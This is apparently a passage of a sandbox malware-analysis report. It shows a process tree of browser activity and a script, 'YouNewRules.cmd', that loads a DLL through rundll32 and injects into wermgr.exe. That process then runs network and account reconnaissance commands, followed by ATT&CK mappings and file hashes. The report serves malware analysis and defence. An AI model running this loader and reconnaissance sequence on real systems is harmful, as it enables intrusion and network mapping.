- Executes dropped EXE
PID:964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6340 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
PID:1836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6412 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
PID:4644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6528 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
PID:4016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6492 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
PID:3352

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6436 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
PID:4848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4472 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
PID:2068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4460 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
PID:3672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4524 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:2904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6800 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:4164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6748 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:3464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --mojo-platform-channel-handle=6352 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Checks computer location settings
PID:3376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --mojo-platform-channel-handle=1960 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Checks computer location settings
PID:4680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Suspicious use of SetWindowsHookEx
PID:400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --mojo-platform-channel-handle=6804 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Checks computer location settings
PID:4996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6960 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:4112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6948 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:2904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5756 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:1960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6524 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:4760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2720 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:5008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5808 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:2712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5716 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:2
2⤵
PID:4632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4552 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:2064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6680 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6368 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:3600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --mojo-platform-channel-handle=1296 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Checks computer location settings
PID:2796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --mojo-platform-channel-handle=6772 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Checks computer location settings
PID:1808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --mojo-platform-channel-handle=5568 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Checks computer location settings
PID:1140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --mojo-platform-channel-handle=5716 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Checks computer location settings
PID:4408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7172 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:5088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6260 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:4584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7560 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7648 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:4984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7476 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:3120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7388 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:1688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7440 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:4624

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7508 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:3804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7344 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:4140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7336 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
PID:2064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --mojo-platform-channel-handle=7568 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Checks computer location settings
PID:5068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --mojo-platform-channel-handle=4452 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Checks computer location settings
PID:964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --mojo-platform-channel-handle=4624 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Checks computer location settings
PID:636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --mojo-platform-channel-handle=6516 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Checks computer location settings
PID:5088

C:\Program Files\Google\Chrome\Application\108.0.5359.125\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\108.0.5359.125\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:3952

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4308

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Enumerates connected drives
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1520

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1520.0.959853979\382693960" -parentBuildID 20200403170909 -prefsHandle 1728 -prefMapHandle 1720 -prefsLen 1 -prefMapSize 222134 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1520 "\\.\pipe\gecko-crash-server-pipe.1520" 1808 gpu
3⤵
PID:4928

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1520.3.198679992\1623597797" -childID 1 -isForBrowser -prefsHandle 2580 -prefMapHandle 2576 -prefsLen 27 -prefMapSize 222134 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1520 "\\.\pipe\gecko-crash-server-pipe.1520" 2588 tab
3⤵
PID:4348

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1520.13.493593083\1983353173" -childID 2 -isForBrowser -prefsHandle 3660 -prefMapHandle 3652 -prefsLen 6183 -prefMapSize 222134 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1520 "\\.\pipe\gecko-crash-server-pipe.1520" 3692 tab
3⤵
PID:1824

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1520.20.136158616\99456196" -childID 3 -isForBrowser -prefsHandle 4716 -prefMapHandle 4748 -prefsLen 6888 -prefMapSize 222134 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1520 "\\.\pipe\gecko-crash-server-pipe.1520" 4732 tab
3⤵
PID:800

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1520.27.681724867\915432742" -childID 4 -isForBrowser -prefsHandle 1512 -prefMapHandle 2448 -prefsLen 7042 -prefMapSize 222134 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1520 "\\.\pipe\gecko-crash-server-pipe.1520" 4940 tab
3⤵
PID:3032

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1520.28.1749891344\1663263106" -childID 5 -isForBrowser -prefsHandle 5064 -prefMapHandle 1512 -prefsLen 7042 -prefMapSize 222134 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1520 "\\.\pipe\gecko-crash-server-pipe.1520" 3196 tab
3⤵
PID:692

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1520.29.245319144\377306404" -childID 6 -isForBrowser -prefsHandle 5656 -prefMapHandle 4412 -prefsLen 7042 -prefMapSize 222134 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1520 "\\.\pipe\gecko-crash-server-pipe.1520" 3252 tab
3⤵
PID:4276

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1520.30.703535042\2130786958" -childID 7 -isForBrowser -prefsHandle 2444 -prefMapHandle 2484 -prefsLen 7042 -prefMapSize 222134 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1520 "\\.\pipe\gecko-crash-server-pipe.1520" 5064 tab
3⤵
PID:1388

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1520.31.986536989\600411086" -childID 8 -isForBrowser -prefsHandle 4924 -prefMapHandle 3196 -prefsLen 8381 -prefMapSize 222134 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1520 "\\.\pipe\gecko-crash-server-pipe.1520" 5760 tab
3⤵
PID:4328

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1520.32.1448574475\316872150" -childID 9 -isForBrowser -prefsHandle 6720 -prefMapHandle 6516 -prefsLen 8520 -prefMapSize 222134 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1520 "\\.\pipe\gecko-crash-server-pipe.1520" 6696 tab
3⤵
PID:3004

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1520.33.696759123\931885463" -childID 10 -isForBrowser -prefsHandle 6952 -prefMapHandle 10572 -prefsLen 8567 -prefMapSize 222134 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1520 "\\.\pipe\gecko-crash-server-pipe.1520" 10220 tab
3⤵
PID:4684

C:\Users\Admin\Downloads\Firefox Installer.exe
"C:\Users\Admin\Downloads\Firefox Installer.exe"
1⤵
PID:4856

C:\Users\Admin\AppData\Local\Temp\7zS8F245C4B\setup-stub.exe
.\setup-stub.exe
2⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5104

C:\Users\Admin\AppData\Local\Temp\nsm7A1.tmp\download.exe
"C:\Users\Admin\AppData\Local\Temp\nsm7A1.tmp\download.exe" /LaunchedFromStub /INI=C:\Users\Admin\AppData\Local\Temp\nsm7A1.tmp\config.ini
3⤵
PID:2632

C:\Users\Admin\AppData\Local\Temp\7zS84A5D20B\setup.exe
.\setup.exe /LaunchedFromStub /INI=C:\Users\Admin\AppData\Local\Temp\nsm7A1.tmp\config.ini
4⤵
- Registers COM server for autorun
- Drops file in Program Files directory
- Modifies registry class
PID:4816

C:\Windows\system32\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Mozilla Firefox\AccessibleMarshal.dll"
5⤵
- Registers COM server for autorun
- Modifies registry class
PID:4424

C:\Windows\system32\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Mozilla Firefox\AccessibleHandler.dll"
5⤵
- Registers COM server for autorun
- Modifies registry class
PID:4592

C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe
"C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe"
5⤵
- Drops file in Program Files directory
PID:4416

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice_tmp.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice_tmp.exe" install
6⤵
PID:3664

C:\Program Files\Mozilla Firefox\default-browser-agent.exe
"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" register-task 308046B0AF4A39CB
5⤵
PID:900

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -reset-profile -migration -first-startup
3⤵
PID:4268

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -reset-profile -migration -first-startup
4⤵
- Checks processor information in registry
PID:904

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c SomeDocument\YouNewRules.cmd A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9
1⤵
- Enumerates connected drives
PID:2420

C:\Windows\system32\rundll32.exe
rundll32 /s lastupdates.get,Updt
2⤵
PID:3988

C:\Windows\SysWOW64\rundll32.exe
rundll32 /s lastupdates.get,Updt
3⤵
- Suspicious behavior: MapViewOfSection
PID:2988

C:\Windows\SysWOW64\wermgr.exe
C:\Windows\SysWOW64\wermgr.exe
4⤵
PID:3116

C:\Windows\SysWOW64\net.exe
net view
5⤵
- Discovers systems in the same network
PID:2488

C:\Windows\SysWOW64\cmd.exe
cmd /c set
5⤵
PID:4472

C:\Windows\SysWOW64\arp.exe
arp -a
5⤵
PID:4004

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
5⤵
- Gathers network information
PID:1536

C:\Windows\SysWOW64\nslookup.exe
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.WORKGROUP
5⤵
PID:3564

C:\Windows\SysWOW64\net.exe
net share
5⤵
PID:4032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share
6⤵
PID:4116

C:\Windows\SysWOW64\route.exe
route print
5⤵
PID:4016

C:\Windows\SysWOW64\netstat.exe
netstat -nao
5⤵
- Gathers network information
PID:4088

C:\Windows\SysWOW64\net.exe
net localgroup
5⤵
PID:2476

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup
6⤵
PID:4768

C:\Windows\SysWOW64\whoami.exe
whoami /all
5⤵
PID:3128

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" E:\SomeDocument\YouNewRules.cmd
1⤵
- Enumerates connected drives
PID:460

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" E:\SomeDocument\DirectContract.txt
1⤵
- Enumerates connected drives
PID:4720

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" E:\SomeDocument\PayInfo.txt
1⤵
- Enumerates connected drives
PID:3852

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "E:\SomeDocument\YouNewRules.cmd"
1⤵
- Enumerates connected drives
PID:4324

C:\Windows\system32\rundll32.exe
rundll32 /s lastupdates.get,Updt
2⤵
PID:4772

C:\Windows\SysWOW64\rundll32.exe
rundll32 /s lastupdates.get,Updt
3⤵
- Suspicious behavior: MapViewOfSection
PID:3548

C:\Windows\SysWOW64\wermgr.exe
C:\Windows\SysWOW64\wermgr.exe
4⤵
PID:4304

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2284

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" "F:\SomeDocument\LastUpdates.get"
2⤵
PID:2240

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"F:\SomeDocument\LastUpdates\" -ad -an -ai#7zMap4999:66:7zEvent1040
1⤵
PID:1388

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:1704

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4004_1694836645\ChromeRecovery.exe
Filesize
253KB

MD5
49ac3c96d270702a27b4895e4ce1f42a

SHA1
55b90405f1e1b72143c64113e8bc65608dd3fd76

SHA256
82aa3fd6a25cda9e16689cfadea175091be010cecae537e517f392e0bef5ba0f

SHA512
b62f6501cb4c992d42d9097e356805c88ac4ac5a46ead4a8eee9f8cbae197b2305da8aab5b4a61891fe73951588025f2d642c32524b360687993f98c913138a0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved\1.3.36.141\Recovery.crx3
Filesize
141KB

MD5
ea1c1ffd3ea54d1fb117bfdbb3569c60

SHA1
10958b0f690ae8f5240e1528b1ccffff28a33272

SHA256
7c3a6a7d16ac44c3200f572a764bce7d8fa84b9572dd028b15c59bdccbc0a77d

SHA512
6c30728cac9eac53f0b27b7dbe2222da83225c3b63617d6b271a6cfedf18e8f0a8dffa1053e1cbc4c5e16625f4bbc0d03aa306a946c9d72faa4ceb779f8ffcaf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
28KB

MD5
be4eeafcd54bb70f78838480e149050d

SHA1
3406d16e1158bd319ae8300044b01114acc50350

SHA256
f7bc03df2b56b3000169aa53abdae85e93d30a5cad9bcdcce2729266fd7e74ba

SHA512
6533693226c46110efe075c919acb4c07c8cbdfbafb2cbbbe63c1002226fd1d35e45c96a5df6712e5a2e2bc6054b73f663a973d6c0d869c1fe71ee679793553a

Download Submit
\??\pipe\crashpad_1788_NCXSYLUSXVTNWOZG
MD5
